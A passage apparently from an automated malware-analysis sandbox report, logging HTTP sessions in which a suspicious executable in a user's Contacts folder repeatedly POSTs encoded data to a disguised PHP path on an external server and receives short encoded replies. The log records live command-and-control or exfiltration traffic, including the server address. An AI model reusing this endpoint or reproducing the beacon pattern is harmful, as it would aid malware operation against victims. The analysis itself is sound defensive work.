                                                            Nov 21, 2023 04:48:05.718548059 CET398OUTData Raw: 57 5d 58 5c 5b 58 5f 59 5d 57 55 57 55 5b 57 54 50 53 58 41 56 5f 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X\[X_Y]WUWU[WTPSXAV_WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*6(>*;6#*(#%&-.00).-+#,&G''^)3
                                                            Nov 21, 2023 04:48:05.921027899 CET399INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:05 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            58192.168.2.54977277.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:05.520483971 CET395OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:05.718169928 CET396INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:05.718548059 CET398OUTData Raw: 57 5d 58 5c 5b 58 5f 59 5d 57 55 57 55 5b 57 54 50 53 58 41 56 5f 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X\[X_Y]WUWU[WTPSXAV_WY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*6(>*;6#*(#%&-.00).-+#,&G''^)3
                                                            Nov 21, 2023 04:48:05.921027899 CET399INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:05 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            59192.168.2.54977377.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:05.950911999 CET399OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:06.152107000 CET400INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:06.152419090 CET402OUTData Raw: 57 50 5d 59 5b 52 5a 51 5d 57 55 57 55 5b 57 51 50 5c 58 42 56 53 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Y[RZQ]WUWU[WQP\XBVSWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'="<>V* ;"] :=X)#.Q$-"'0.W9+=?#Y->&G''^)3
                                                            Nov 21, 2023 04:48:06.358747005 CET405INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 05 26 3f 05 02 37 33 37 55 2b 2a 31 51 2d 00 0f 18 28 20 31 13 26 3d 19 07 27 07 21 54 3f 11 2b 01 30 00 2c 56 23 50 30 59 29 30 21 5a 0c 1d 25 07 36 38 3b 52 2b 3e 0e 59 28 2d 0e 18 26 0f 2f 1a 3c 3d 20 0a 34 0a 3b 58 26 30 3b 0b 2f 59 31 59 2f 38 35 1b 27 3c 2d 07 34 17 23 5f 0c 14 24 0b 23 22 3f 5f 34 0e 07 0d 22 37 30 59 20 24 2b 56 27 2d 30 1c 32 06 2d 17 3c 06 28 1e 32 09 24 13 30 04 27 55 26 3a 33 56 3f 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !&?737U+*1Q-( 1&='!T?+0,V#P0Y)0!Z%68;R+>Y(-&/<= 4;X&0;/Y1Y/85'<-4#_$#"?_4"70Y $+V'-02-<(2$0'U&:3V?:&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5977.91.124.10180192.168.2.549773C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:05.950911999 CET399OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:06.152107000 CET400INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:06.152419090 CET402OUTData Raw: 57 50 5d 59 5b 52 5a 51 5d 57 55 57 55 5b 57 51 50 5c 58 42 56 53 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Y[RZQ]WUWU[WQP\XBVSWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'="<>V* ;"] :=X)#.Q$-"'0.W9+=?#Y->&G''^)3
                                                            Nov 21, 2023 04:48:06.358747005 CET405INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 01 10 21 05 26 3f 05 02 37 33 37 55 2b 2a 31 51 2d 00 0f 18 28 20 31 13 26 3d 19 07 27 07 21 54 3f 11 2b 01 30 00 2c 56 23 50 30 59 29 30 21 5a 0c 1d 25 07 36 38 3b 52 2b 3e 0e 59 28 2d 0e 18 26 0f 2f 1a 3c 3d 20 0a 34 0a 3b 58 26 30 3b 0b 2f 59 31 59 2f 38 35 1b 27 3c 2d 07 34 17 23 5f 0c 14 24 0b 23 22 3f 5f 34 0e 07 0d 22 37 30 59 20 24 2b 56 27 2d 30 1c 32 06 2d 17 3c 06 28 1e 32 09 24 13 30 04 27 55 26 3a 33 56 3f 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: !&?737U+*1Q-( 1&='!T?+0,V#P0Y)0!Z%68;R+>Y(-&/<= 4;X&0;/Y1Y/85'<-4#_$#"?_4"70Y $+V'-02-<(2$0'U&:3V?:&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            677.91.124.10180192.168.2.549718C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:30.299001932 CET166OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:30.495738983 CET167INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:30.495970964 CET169OUTData Raw: 57 5f 58 5f 5b 5e 5f 5a 5d 57 55 57 55 5e 57 5b 50 58 58 46 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_X_[^_Z]WUWU^W[PXXFVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+;V= 4/4#+%'$ *9+6<;;&G''^)
                                                            Nov 21, 2023 04:47:30.699763060 CET170INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6192.168.2.54971877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:30.299001932 CET166OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:30.495738983 CET167INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:30.495970964 CET169OUTData Raw: 57 5f 58 5f 5b 5e 5f 5a 5d 57 55 57 55 5e 57 5b 50 58 58 46 56 54 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_X_[^_Z]WUWU^W[PXXFVTWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+;V= 4/4#+%'$ *9+6<;;&G''^)
                                                            Nov 21, 2023 04:47:30.699763060 CET170INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            60192.168.2.54977477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:06.084899902 CET400OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:06.281615973 CET402INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:06.281907082 CET404OUTData Raw: 57 59 58 5a 5e 5e 5a 5e 5d 57 55 57 55 5a 57 5a 50 5d 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXZ^^Z^]WUWUZWZP]XHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8=<;*0;/7*Z7:+ ='%33"T-;">?(->&G''^)7
                                                            Nov 21, 2023 04:48:06.485061884 CET405INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6077.91.124.10180192.168.2.549774C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:06.084899902 CET400OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:06.281615973 CET402INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:06.281907082 CET404OUTData Raw: 57 59 58 5a 5e 5e 5a 5e 5d 57 55 57 55 5a 57 5a 50 5d 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYXZ^^Z^]WUWUZWZP]XHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8=<;*0;/7*Z7:+ ='%33"T-;">?(->&G''^)7
                                                            Nov 21, 2023 04:48:06.485061884 CET405INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6177.91.124.10180192.168.2.549775C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:06.802329063 CET406OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:07.001066923 CET406INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.001455069 CET409OUTData Raw: 52 5a 5d 5a 5e 5d 5a 50 5d 57 55 57 55 58 57 5a 50 5e 58 40 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]Z^]ZP]WUWUXWZP^X@VUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+2?2)3'_,$97:9X?06Q02V$#&-]=>?7-.&G''^)?
                                                            Nov 21, 2023 04:48:07.205137968 CET409INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            61192.168.2.54977577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:06.802329063 CET406OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:07.001066923 CET406INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.001455069 CET409OUTData Raw: 52 5a 5d 5a 5e 5d 5a 50 5d 57 55 57 55 58 57 5a 50 5e 58 40 56 55 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ]Z^]ZP]WUWUXWZP^X@VUW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+2?2)3'_,$97:9X?06Q02V$#&-]=>?7-.&G''^)?
                                                            Nov 21, 2023 04:48:07.205137968 CET409INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:06 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            62192.168.2.54977677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:07.523130894 CET410OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:07.720772028 CET410INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.721007109 CET413OUTData Raw: 52 5a 5d 5b 5b 53 5f 5c 5d 57 55 57 55 5b 57 5b 50 5a 58 45 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ][[S_\]WUWU[W[PZXEVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*-_<;=>+^8&Z7*\?0"Q&-1$ :W-;&]((8.&G''^)3
                                                            Nov 21, 2023 04:48:07.924458981 CET413INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:07 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            6277.91.124.10180192.168.2.549776C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:07.523130894 CET410OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:07.720772028 CET410INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:07.721007109 CET413OUTData Raw: 52 5a 5d 5b 5b 53 5f 5c 5d 57 55 57 55 5b 57 5b 50 5a 58 45 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: RZ][[S_\]WUWU[W[PZXEVPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*-_<;=>+^8&Z7*\?0"Q&-1$ :W-;&]((8.&G''^)3
                                                            Nov 21, 2023 04:48:07.924458981 CET413INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:07 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            63192.168.2.54977777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:08.237934113 CET414OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:08.439186096 CET414INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:08.439804077 CET417OUTData Raw: 52 5b 5d 5d 5b 59 5f 5b 5d 57 55 57 55 5b 57 54 50 58 58 40 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]][Y_[]WUWU[WTPXX@VWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*+.+9?07.4%4!+#.Q&=V'#%.]<,,.&G''^)3
                                                            Nov 21, 2023 04:48:08.642436981 CET417INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:08 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
